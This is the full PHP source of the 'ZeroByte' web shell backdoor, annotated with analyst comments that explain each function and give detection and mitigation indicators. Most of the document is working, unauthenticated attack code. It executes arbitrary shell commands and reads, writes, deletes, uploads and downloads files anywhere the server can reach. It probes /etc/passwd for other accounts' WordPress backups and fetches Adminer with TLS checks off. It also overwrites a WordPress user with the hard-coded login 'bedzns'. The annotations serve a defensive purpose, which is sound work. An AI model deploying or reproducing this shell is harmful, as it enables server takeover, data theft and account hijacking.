
Untitled

a guest
Jul 16th, 2019
  1. <?php
  // Analyst note: exect() runs an arbitrary OS command string and returns its captured output.
  // It tries system(), exec(), passthru() and shell_exec() in that order and uses the first one
  // for which function_exists() is true, so a disable_functions list that omits any one of
  // them leaves this helper working. $cmd reaches the OS with no escaping or validation.
  // Every call is prefixed with @, which suppresses PHP error output.
  // If none of the four functions is available the function falls through and returns null.
  // Detection: a function_exists() cascade over these four names wrapped around @-silenced
  // calls is a common static signature of PHP web shells.
  2. function exect($cmd) {
  3. if(function_exists('system')) {
  4. @ob_start(); // system() prints directly, so output is buffered to return it as a string
  5. @system($cmd);
  6. $exect = @ob_get_contents();
  7. @ob_end_clean();
  8. return $exect;
  9. } elseif(function_exists('exec')) {
  10. @exec($cmd,$results); // exec() fills $results with one array element per output line
  11. $exect = "";
  12. foreach($results as $result) {
  13. $exect .= $result; // lines are joined with no separator between them
  14. } return $exect;
  15. } elseif(function_exists('passthru')) {
  16. @ob_start(); // same buffering approach as the system() branch
  17. @passthru($cmd);
  18. $exect = @ob_get_contents();
  19. @ob_end_clean();
  20. return $exect;
  21. } elseif(function_exists('shell_exec')) {
  22. $exect = @shell_exec($cmd);
  23. return $exect;
  24. }
  25. }
  26.  
  27.  
  // Analyst note: fperms() reads the mode bits of $filen with fileperms() and echoes them as a
  // nine-character rwx string wrapped in <center><small>. It returns nothing.
  // Owner, group and other each get three characters; the execute slot shows s/S or t/T when
  // the 0x0800, 0x0400 or 0x0200 bit is set (setuid, setgid and sticky in the usual mode layout).
  // In the file manager this lets the operator see at a glance which paths are writable.
  28. function fperms($filen) {
  29. $perms = fileperms($filen);
  30. $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-'); // owner read
  31. $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-'); // owner write
  32. $fpermsinfo .= (($perms & 0x0040) ?
  33. (($perms & 0x0800) ? 's' : 'x' ) :
  34. (($perms & 0x0800) ? 'S' : '-'));
  35. $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-'); // group read
  36. $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-'); // group write
  37. $fpermsinfo .= (($perms & 0x0008) ?
  38. (($perms & 0x0400) ? 's' : 'x' ) :
  39. (($perms & 0x0400) ? 'S' : '-'));
  40. $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-'); // other read
  41. $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-'); // other write
  42. $fpermsinfo .= (($perms & 0x0001) ?
  43. (($perms & 0x0200) ? 't' : 'x' ) :
  44. (($perms & 0x0200) ? 'T' : '-'));
  45. echo '<center><small>'.$fpermsinfo.'</small></center>';
  46. }
  47.  
  48. ?>
  49. <title>ZeroByte.ID PHP Backdoor</title>
  50. <link href='//fonts.googleapis.com/css?family=Share+Tech+Mono' rel='stylesheet' type='text/css'>
  51. <style type="text/css">
  52. body {
  53. font-family: courier;
  54. background: #f2f2f2;
  55. font-size: 1px;
  56. }
  57. h1 a {
  58. font-weight: normal;
  59. font-family: 'Share Tech Mono';
  60. font-size: 20px;
  61. color:#006600;
  62. text-decoration: none;
  63. margin: 0px;
  64. }
  65. h2 {
  66. font-size: 20px;
  67. color: #006600;
  68. text-align: center;
  69. padding-top: 5px;
  70. margin: 0;
  71. margin-top: 10px;
  72. }
  73. .menu {
  74. text-align: center;
  75. font-size: 12px;
  76. border-bottom: 1px dashed #006600;
  77. padding-bottom: 5px;
  78. margin-bottom: 10px;
  79. }
  80. .menu a {
  81. margin-top: 2px;
  82. color: #006600;
  83. text-decoration: none;
  84. display: inline-block;
  85. }
  86. .container {
  87. font-size: 12px;
  88. }
  89. .filemgr {
  90. font-size: 12px;
  91. width: 100%
  92. }
  93. .filemgr td {
  94. padding: 3px;
  95. border-bottom: 1px dashed #006600;
  96. }
  97. .filemgr a{
  98. text-decoration: none;
  99. color:#006600;
  100. }
  101. tr:hover {
  102. background: #cccccc;
  103. }
  104. .tdtl {
  105. background:#006600;color:#ffffff;text-align:center;font-weight:bold;
  106. }
  107. .footer {
  108. text-align: center;
  109. border-radius: 30px;
  110. margin-top: 25px;
  111. border-top: 1px double #006600;
  112. padding: 5px;
  113. }
  114. .footer a {
  115. color: #006600;
  116. text-decoration: none;
  117. }
  118. p {
  119. word-wrap: break-word;
  120. margin:2;
  121. }
  122. a {
  123. text-decoration: none;
  124. color: #006600;
  125. }
  126. .act {
  127. text-align: center;
  128. }
  129. .txarea {
  130. width:100%;
  131. height:200px;
  132. background:transparent;
  133. border:1px solid #006600;
  134. padding:1px;color:#006600;
  135. }
  136. </style>
  137. <div class="container">
  138. <div style="position:relative;width: 100%;margin-bottom: 5px;border-bottom: 1px dashed #006600;">
  139. <div style="float: left;width: 15%;text-align: center;border: 1px dashed #006600;margin-bottom: 5px;">
  140. <h1><a href="?">ZeroByte Shell<br><small>V 1.2 (Beta)</small></a></h1>
  141. </div>
  142. <div style="float: right;width: 83%;">
  143. <?php
  // Analyst note: environment fingerprinting, rendered in the page header on every request.
  // It prints php_uname(), checks whether the mysql_connect and curl_version functions exist,
  // and runs `wget --help`, `perl --help` and `gcc --help` through exect() to see which tools
  // are installed (any non-empty output is shown as ON).
  // Detection: the web-server account spawning wget, perl and gcc with --help in quick
  // succession is unusual for an ordinary PHP application and is visible in process telemetry.
  144. echo php_uname();
  145. $mysql = (function_exists('mysql_connect')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  146. $curl = (function_exists('curl_version')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  147. $wget = (exect('wget --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  148. $perl = (exect('perl --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  149. $gcc = (exect('gcc --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  // The configured disable_functions list is read and displayed to the operator.
  150. $disfunc = @ini_get("disable_functions");
  // The [ KILL ME ] link points at ?bypass=killdiscfunc; no code in this listing reads a
  // 'bypass' parameter, so the link only reloads the page as far as this listing shows.
  151. $show_disf = (!empty($disfunc)) ? "<font color=red>$disfunc</font> <a href='?bypass=killdiscfunc' style='text-decoration:none;color:#0000FF;font-weight: bold;'>[ KILL ME ]</a>" : "<font color=#006600>NONE</font>";
  152. echo '<br>[ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]';
  153. echo '<p>Disable Function: '.$show_disf;
  154.  
  155. ?>
  156. </div>
  157. <div style="clear: both;" ="clear"></div>
  158. </div>
  159.  
  160. <?php
  161.  
  // Analyst note: the directory to browse is taken straight from the query string.
  // No login, token or address check appears anywhere in this listing, so anyone who can reach
  // the URL gets the same file-system access as the PHP process.
  // $dir is the current working directory only when the request has no GET parameters at all;
  // otherwise it is $_GET['path'], which is unset when only other parameters are present.
  // Incident response: web-server access logs with path=, file= or lastpath= parameters holding
  // absolute server paths show which directories and files were visited through this page.
  162. if(empty($_GET)) {
  163. $dir = getcwd();
  164. }
  165. else {
  166. $dir = $_GET['path'];
  167. }
  168.  
  // $offdir is the "current location" carried between pages: path, else the directory of
  // file, else lastpath, else the working directory. It is used below for links, rename and upload.
  169. if(!empty($_GET['path'])) {$offdir = $_GET['path'];}
  170. else if(!empty($_GET['file'])) {$offdir = dirname($_GET['file']);}
  171. else if(!empty($_GET['lastpath'])) {$offdir = $_GET['lastpath'];}
  172. else {$offdir = getcwd();}
  173.  
  174. ?>
  175. <div class="menu">
  176. <a href="?ext=backupwordpress&lastpath=<?php echo $offdir;?>">[ Jumping Backup Wordpress ]</a>
  177. <a href="?ext=sql_interface&lastpath=<?php echo $offdir;?>">[ MySQL Interface ]</a>
  178. <a href="?ext=shellcmd&lastpath=<?php echo $offdir;?>">[ Shell Command ]</a>
  179. <a href="?ext=uploader&lastpath=<?php echo $offdir;?>">[ Uploader ]</a>
  180. </div>
  181. <?php
  182. ## CURRENT DIR ##
  // Analyst note: renders $offdir as a clickable breadcrumb. Backslashes are normalised to
  // forward slashes, the path is split on "/", and each segment links to ?path=<prefix up to
  // that segment>, so the operator can move up the tree from any location.
  // The request-derived path is written into the HTML without escaping.
  183.  
  184. echo '<div style="margin-bottom:10px;">';
  185. echo '<span style="border:1px dashed #009900;padding:2px;">';
  186. $lendir = str_replace("\\","/",$offdir);
  187. $xlendir = explode("/", $lendir);
  188. foreach($xlendir as $c_dir => $cdir) {
  189. echo "<a href='?path=";
  // Rebuild the path prefix from segment 0 through the current segment index.
  190. for($i = 0; $i <= $c_dir; $i++) {
  191. echo $xlendir[$i];
  192. if($i != $c_dir) {
  193. echo "/";
  194. }
  195. }
  196. echo "'>$cdir</a>/";
  197. }
  198. echo '</span></div>';
  199. ## EOF CURRENT DIR ##
  200.  
  // Analyst note: file manager table for $dir. scandir() output is split into directories and
  // files; every row shows the entry's permission string via fperms() and links to the action
  // handlers further down (rename, rmdir, edit, view, delete, download, extract2tmp).
  // Nothing restricts $dir to the web root, so any directory readable by the PHP process can
  // be listed. Entry names and paths are echoed without HTML escaping.
  // Incident response: requests whose query string carries action=<verb>&file=<absolute path>
  // map one-to-one onto operations performed through this table.
  201. if(!empty($dir)) {
  202. echo '<table class="filemgr">';
  203. echo '<tr><td class="tdtl">Name</td><td class="tdtl" width="9%">Permission</td><td class="tdtl" width="18%">Action</td></tr>'."\n";
  204. $directories = array();
  205. $files_list = array();
  206. $files = scandir($dir);
  207. foreach($files as $file){
  208. if(($file != '.') && ($file != '..')){
  209. if(is_dir($dir.'/'.$file)){
  210. $directories[] = $file;
  211.  
  212. } else{
  213. $files_list[] = $file;
  214.  
  215. }
  216. }
  217. }
  218.  
  // Directories first: each links to ?path= for navigation, plus RENAME and DELETE (rmdir).
  219. foreach($directories as $directory){
  220. echo '<tr><td><span class="dbox">[D]</span> <a href="?path='.$dir.'/'.$directory.'">'.$directory.'/</a></td>'."\n";
  221. echo '<td>';
  222. fperms($dir.'/'.$directory);
  223. echo '</td>'."\n";
  224. echo '<td class="act">';
  225. echo '<a href="?action=rename&file='.$dir.'/'.$directory.'" class="act">RENAME</a> ';
  226. echo '<a href="?action=rmdir&file='.$dir.'/'.$directory.'" class="act">DELETE</a>';
  227. echo '</td>'."\n";
  228. echo '</tr>'."\n";
  229. }
  230. foreach($files_list as $filename){
  // Names ending in "tar" + any one character + "gz" (the dot is not escaped in the pattern)
  // get an extra EXTRACT TO TMP link and no view/edit link.
  231. if(preg_match('/(tar.gz)$/', $filename)) {
  232. echo '<tr><td><span class="dbox">[F]</span> <a href="#" class="act">'.$filename.'</a>'."\n";
  233. echo ' <a href="?ext=extract2tmp&gzname='.$dir.'/'.$filename.'" style="background:#006600;color:#ffffff;padding:1px;padding-left:5px;padding-right:5px;">EXTRACT TO TMP</a>';
  234. echo '</td>'."\n";
  235. echo '<td>';
  236. fperms($dir.'/'.$filename);
  237. echo '</td>'."\n";
  238. echo '<td class="act">';
  239. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  240. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  241. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  242. echo '</td>'."\n";
  243. echo '</tr>'."\n";
  244. }
  // All other files: the name links to the read-only viewer, with EDIT/RENAME/DELETE/DOWNLOAD.
  245. else {
  246. echo '<tr><td><span class="dbox">[F]</span> <a href="?action=view&file='.$dir.'/'.$filename.'" class="act">'.$filename.'</a></td>'."\n";
  247. echo '<td>';
  248. fperms($dir.'/'.$filename);
  249. echo '</td>'."\n";
  250. echo '<td class="act">';
  251. echo '<a href="?action=edit&file='.$dir.'/'.$filename.'" class="act">EDIT</a> ';
  252. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  253. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  254. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  255. echo '</td>'."\n";
  256. echo '</tr>'."\n";
  257. }
  258. }
  259. echo '</table>';
  260. }
  261.  
  262.  
  // Analyst note: file-operation handlers selected by the 'action' query parameter. In every
  // branch the target is $_GET['file'], used as given with no base-directory restriction, so
  // the reach is whatever the PHP process account can read or write.
  //   edit     - writes POST field 'src' to the file (arbitrary file write), then shows it
  //   view     - shows the file contents read-only (arbitrary file read)
  //   rename   - renames the file to $offdir/<POST 'rename'>
  //   delete   - unlink()
  //   rmdir    - rmdir(), falling back to `rm -rf` through exect()
  //   download - streams the file as an attachment and exits
  // Incident response: after finding this page on a host, treat any file writable by the web
  // account as possibly modified; compare against known-good copies or integrity baselines.
  263. if($_GET['action'] == 'edit') {
  264. if($_POST['save']) {
  265. $save = file_put_contents($_GET['file'], $_POST['src']);
  266. if($save) {
  267. $act = "<font color=#006600>Successed!</font>";
  268. } else {
  269. $act = "<font color=red>Permission Denied!</font>";
  270. }
  271. echo "".$act."<br>";
  272. }
  273. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  274. echo "<form method='post'>
  275. <textarea name='src' class='txarea'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  276. <input type='submit' value='Save' name='save' style='width: 20%;background:#006600;border:none;color:#f2f2f2;margin-top:5px;height:30px;'>
  277. </form>";
  278. }
  279. else if($_GET['action'] == 'view') {
  280. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  281. echo "<textarea class='txarea' style='height:400px;' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  282. }
  283. else if($_GET['action'] == 'rename') {
  284. $path = $offdir;
  285. if($_POST['do_rename']) {
  // The new name is passed through htmlspecialchars() only; that is HTML escaping and does
  // not constrain the destination path.
  286. $rename = rename($_GET['file'], "$path/".htmlspecialchars($_POST['rename'])."");
  287. if($rename) {
  288. $act = "<font color=#006600>Successed!</font>";
  289. } else {
  290. $act = "<font color=red>Permission Denied!</font>";
  291. }
  292. echo "".$act."<br>";
  293. }
  294. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  295. echo "<form method='post'>
  296. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  297. <input type='submit' name='do_rename' value='rename'>
  298. </form>";
  299. }
  300. else if($_GET['action'] == 'delete') {
  301. $path = $offdir;
  // A plain GET request is enough to delete a file; there is no confirmation step.
  302. $delete = unlink($_GET['file']);
  303. if($delete) {
  304.  
  305. } else {
  306. $act = "<font color=red>Permission Denied!</font>";
  307. }
  308. echo $act;
  309. } else if($_GET['action'] == 'rmdir') {
  310. $path = $offdir;
  311. $delete = rmdir($_GET['file']);
  312. if($delete) {
  313. echo '<font color=#006600>Deleted!</font><br>';
  314. } else {
  315. echo "\n<font color=#006600>Try Force Delete!</font>\n<br>";
  // Fallback: the raw query-string value is concatenated into a shell command line.
  // Detection: the web-server account spawning `rm -rf` is visible in process telemetry.
  316. exect('rm -rf '.$_GET['file']);
  317. if(file_exists($_GET['file'])) {
  318. echo '<font color=red>Permission Denied!</font>';
  319. } else
  320. {
  321. echo '<font color=#006600>Deleted!</font>';
  322. }
  323. }
  324.  
  325. } else if($_GET['action'] == 'download') {
  // Discards anything already buffered, then sends the file as application/octet-stream.
  // Large or unusual response sizes for this URL in access logs indicate files taken this way.
  326. @ob_clean();
  327. $file = $_GET['file'];
  328. header('Content-Description: File Transfer');
  329. header('Content-Type: application/octet-stream');
  330. header('Content-Disposition: attachment; filename="'.$file.'"');
  331. header('Expires: 0');
  332. header('Cache-Control: must-revalidate');
  333. header('Pragma: public');
  334. header('Content-Length: ' . filesize($file));
  335. readfile($file);
  336. exit;
  337. }
  338.  
  // Analyst note: cross-account enumeration for shared hosting. It reads /etc/passwd, takes the
  // text before ":x:" on each line as an account name, and tests whether
  // /home/<account>/backupwordpress is readable (and writable) by the PHP process. Matches are
  // printed as ?path= links into the file manager, followed by a count and the resolved host IP.
  // Mitigation: home directories that other accounts cannot read, and a per-site open_basedir
  // restriction, make these is_readable() probes fail.
  339. if($_GET['ext'] == 'backupwordpress') {
  340. echo '<h2>.::[ Jumping From Backup Wordpress ]::.</h2>';
  341. $i = 0; // number of readable backupwordpress directories found
  342. echo "<pre><div class='margin: 5px auto;'>";
  343. $etc = fopen("/etc/passwd", "r");
  344. while($passwd = fgets($etc)) {
  345. if($passwd == '' || !$etc) {
  346. echo "<center><font color=red>Can't read /etc/passwd</font></center>";
  347. } else {
  348. preg_match_all('/(.*?):x:/', $passwd, $user);
  349. foreach($user[1] as $users) {
  350. $user_dir = "/home/$users/backupwordpress";
  351. if(is_readable($user_dir)) {
  352. $i++;
  353. $jrw = "[R] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  354. if(is_writable($user_dir)) {
  355. $jrw = "[RW] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  356. }
  357. echo $jrw."\n";
  358.  
  359. }
  360. }
  361. }
  362. }
  363. if($i == 0) {
  364. echo '<center><font color=red>backupwordpress is null in this host!</font></center>';
  365. } else {
  366. echo "<br>Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST'])."";
  367. }
  368. echo "</div></pre>";
  369. }
  370.  
  371. ### EXTRACTOR TO TMP ###
  // Analyst note: unpacks a .tar.gz chosen in the file manager into a temp directory.
  // The destination is the first existing, writable one of <DOCUMENT_ROOT>/tmp/, the tmp/
  // directory beside the document root, or /tmp/. After the EXTRACT button is posted it runs
  // `mkdir` and `tar -xzvf` through exect(); the archive path comes from the 'gzname' query
  // parameter and is concatenated into both command lines without escaping.
  // Detection: the web-server account spawning mkdir and tar, and new directories named after
  // an archive appearing under a tmp path.
  372. else if($_GET['ext'] == 'extract2tmp')
  373. {
  374. if (file_exists($_SERVER["DOCUMENT_ROOT"].'/tmp/') && is_writable($_SERVER["DOCUMENT_ROOT"].'/tmp/')) {
  375. $tmppath = $_SERVER["DOCUMENT_ROOT"].'/tmp/';
  376. }
  377. else if(file_exists(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/') && is_writable(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/')) {
  378. $tmppath = dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/';
  379. }
  380. else if(file_exists('/tmp/') && is_writable('/tmp/')) {
  381. $tmppath = '/tmp/';
  382. }
  383. else {
  384. $tmppath = '';
  385. }
  386.  
  387. if(!empty($tmppath)) {
  388. $gzfile = $_GET['gzname'];
  389. echo '[FILE] '.$gzfile.'<br>';
  390. echo '-- extract to --<br>';
  391. echo '[TMP] '.$tmppath.'<br>';
  392. $bsname = basename($gzfile);
  393. $gzrname = explode(".", $bsname); // element 0 (text before the first dot) names the target directory
  394. echo '<form method="post" action="">';
  395. echo '<input name="extract" type="submit" value="EXTRACT">';
  396. echo '</form>';
  397. if(!empty($_POST['extract'])) {
  398. exect('mkdir '.$tmppath.$gzrname[0]);
  399. $destdir = $tmppath.$gzrname[0];
  400. if (file_exists($destdir) && is_writable($destdir)) {
  401. echo "\n".'[EXTRACTED] <a href="?path='.$destdir.'">'.$destdir.'</a>'."\n";
  402. exect('tar -xzvf '.$gzfile.' -C '.$destdir);
  403. }
  404. else
  405. {
  406. echo 'FAILED!';
  407. }
  408. }
  409. }
  410. else {
  411. echo 'CANNOT EXTRACT TO TMP!';
  412. }
  413.  
  414. }
  415. ### EXTRACTOR TO TMP - EOF ###
  416.  
  417. ### CMD ###
  // Analyst note: interactive command form. The POST field 'cmd' is handed unchanged to
  // exect() and the output is echoed into a read-only textarea.
  // Detection: POST requests to a URL carrying ext=shellcmd with a body field named cmd, and
  // the web-server account spawning shells or utilities it does not normally run.
  // Mitigation: disable_functions must cover every execution function that exect() probes
  // (system, exec, passthru, shell_exec) to block this path; listing only some is not enough.
  418. else if($_GET['ext'] == 'shellcmd')
  419. {
  420. echo '<h2>.::[ Shell Command ]::.</h2>';
  421. echo '<form method="post" action="">';
  422. echo 'terminal:~$ <input name="cmd" type="text" placeholder="echo zerobyte" style="width:300px"/>';
  423. echo ' <input type="submit" value=">>"/>';
  424. echo '</form>';
  425. if(!empty($_POST['cmd'])) {
  426. echo '<textarea style="width:100%;height:150px;" readonly>';
  427. $cmd = $_POST['cmd'];
  428. echo exect($cmd);
  429. echo '</textarea>';
  430. }
  431. }
  432. ### CMD EOF ###
  433.  
  434. ### UPLOADER ###
  // Analyst note: unrestricted file upload. The uploaded temp file is copied to
  // $offdir/<client-supplied file name>; $offdir comes from the query string and there is no
  // check on extension, content type or size. Failures are silenced with @.
  // Detection: new files owned by the web-server account appearing in served directories.
  // Mitigation: writable directories should not be configured to execute PHP.
  435. else if($_GET['ext'] == 'uploader')
  436. {
  437. echo '<h2>.::[ Uploader ]::.</h2>';
  438. echo '<center>';
  439. echo '<form method=post enctype=multipart/form-data>';
  440. echo '<br><br>PATH ['.$offdir.']<br>';
  441. echo '<input type="file" name="zerofile"><input name="postupl" type="submit" value="Upload"><br>';
  442. echo '</form>';
  443. if($_POST["postupl"] == 'Upload')
  444. {
  445. if(@copy($_FILES["zerofile"]["tmp_name"],"$offdir/".$_FILES["zerofile"]["name"]))
  446. { echo '<b>OK! '."$offdir/".$_FILES["zerofile"]["name"].'</b>'; }
  447. else
  448. { echo '<b>Upload Failed.</b>'; }
  449. }
  450. echo '</center>';
  451. }
  452. ### UPLOADER EOF ###
  453.  
  454. ### MYSQL INTERFACE ###
  // Analyst note: drops a database administration tool next to the shell. When the button is
  // posted, call_adminer() fetches Adminer 4.3.1 from adminer.org with cURL and writes it to
  // z-adminer.php in the current working directory, then prints a link to it.
  // TLS peer verification is switched off for the download (CURLOPT_SSL_VERIFYPEER = false).
  // Indicators: a file named z-adminer.php in a web directory, and an outbound HTTPS request
  // from the web server to www.adminer.org.
  455. else if($_GET['ext'] == 'sql_interface')
  456. {
  457. echo '<h2>.::[ MySQL Interface ]::.</h2>';
  458. echo '<center>';
  459. $dwadminer = 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php';
  460. $fileadminer = 'z-adminer.php';
  // Declared inside this branch, so the function only exists once this branch has run.
  461. function call_adminer($dwadminer, $fileadminer) {
  462. $fp = fopen($fileadminer, "w+");
  463. $ch = curl_init();
  464. curl_setopt($ch, CURLOPT_URL, $dwadminer);
  465. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  466. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  467. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  468. curl_setopt($ch, CURLOPT_FILE, $fp); // response body is written to the opened file handle
  469. return curl_exec($ch);
  470. curl_close($ch);
  471. fclose($fp);
  472. ob_flush();
  473. flush();
  474. file_put_contents($dwadminer, $fileadminer);
  475. }
  476. echo '<form method=post enctype=multipart/form-data>';
  477. echo '<input name="mysql_int" type="submit" value="Call Adminer 4.3.1"><br>';
  478. echo '</form>';
  479. if($_POST['mysql_int'] == 'Call Adminer 4.3.1') {
  480. call_adminer($dwadminer, $fileadminer);
  481. $linkz = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]";
  482. if(file_exists('z-adminer.php')) {
  483. echo '<a href="'.$linkz.dirname($_SERVER['PHP_SELF']).'/'.$fileadminer.'" target="_blank">Adminer OK!</a>';
  484. }
  485. else {
  486. echo '<font color="red">[FAILED]</a>';
  487. }
  488.  
  489. }
  490. echo '</center>';
  491. }
  492. ### MYSQL INTERFACE EOF ###
  493.  
  494.  
  495. ### ADDITIONAL BACKUPWORDPRESS BASH ###
  // Analyst note: two handlers selected by the 'grab' query parameter. Both take database
  // host, user, password and name from POST fields, so they work against any database whose
  // credentials the operator has collected (for example from a readable backup or config file).
  //   wp_options    - finds a table ending in _options and prints its 'siteurl' value
  //   wp_users_updt - overwrites the login and password of one row in <prefix>users
  // No menu link in this listing points at these handlers; they look intended for scripted use.
  // Indicators: a WordPress account whose user_login has changed to 'bedzns', and user_pass
  // values stored as a bare MD5 digest.
  496. if($_GET['grab'] == 'wp_options') {
  497. $userdb = $_POST['wpuser'];
  498. $passdb = $_POST['wppass'];
  499. $namedb = $_POST['wpdb'];
  500. $hostdb = $_POST['wphost'];
  501. echo 'WP_OPTIONS';
  502. if(!empty($userdb)) {
  // Uses the legacy mysql_* API (removed in PHP 7.0), so this branch needs an older runtime.
  503. $link = mysql_connect($hostdb, $userdb, $passdb);
  504. if (!$link) {die('Could not connect: ' . mysql_error());}
  505. if (!mysql_select_db($namedb)) {die('Could not select database: ' . mysql_error());}
  506. //
  // The database name is concatenated into the SQL text rather than bound as a parameter.
  507. $tblz = mysql_query("SELECT table_name FROM information_schema.tables WHERE table_schema='".$namedb."' AND table_name LIKE '%_options' LIMIT 1");
  508. if (!$tblz) {die('Could not query:' . mysql_error());}
  509. $tbl = mysql_result($tblz, 0, 'table_name'); // table_name column of the first result row
  510. $result = mysql_query("SELECT option_value FROM ".$tbl." WHERE option_name = 'siteurl' AND option_id = '1'");
  511. if (!$result) {die('Tbl Could not query:' . mysql_error());}
  512. echo "\n".'[DOMAIN] '.mysql_result($result, 0, 'option_value')."\n"; // option_value column of the first result row
  513. mysql_close($link);
  514. }
  515. } else if($_GET['grab'] == 'wp_users_updt') {
  516. $userdb = $_POST['wpuser'];
  517. $passdb = $_POST['wppass'];
  518. $namedb = $_POST['wpdb'];
  519. $hostdb = $_POST['wphost'];
  520. $prefix = $_POST['tpfx'];
  521. echo 'WP_USERS';
  522. $conn = new mysqli($hostdb, $userdb, $passdb, $namedb);
  523. if ($conn->connect_error) {
  524. die("Connection failed: " . $conn->connect_error);
  525. }
  // Rewrites one existing account (first row with user_status = '0') to a hard-coded login
  // and password; the table prefix from POST is concatenated into the statement.
  526. $sql = "UPDATE ".$prefix."users SET user_login = 'bedzns', user_pass = MD5('bedzns') WHERE user_status = '0' LIMIT 1";
  527. if ($conn->query($sql) === TRUE) {
  528. echo "Record updated successfully";
  529. } else {
  530. echo "Error updating record: " . $conn->error;
  531. }
  532. $conn->close();
  533. }
  534. ### ADDITIONAL BACKUPWORDPRESS BASH EOF ###
  535.  
  536.  
  537.  
  538. ### FOOTER ###
  // Analyst note: branding footer, then the closing tag for the .container div opened near the
  // top of the page. Together with the page title and the "ZeroByte Shell" header, these fixed
  // strings are usable as static content indicators when scanning web roots for this file.
  539. echo '<div class="footer">';
  540. echo '&copy; 2017 <a href="https://zerobyte.id/ rel="nofollow" target="_blank">ZeroByte.ID</a>';
  541. echo '</div>';
  542. echo '</div>';
  543. ?>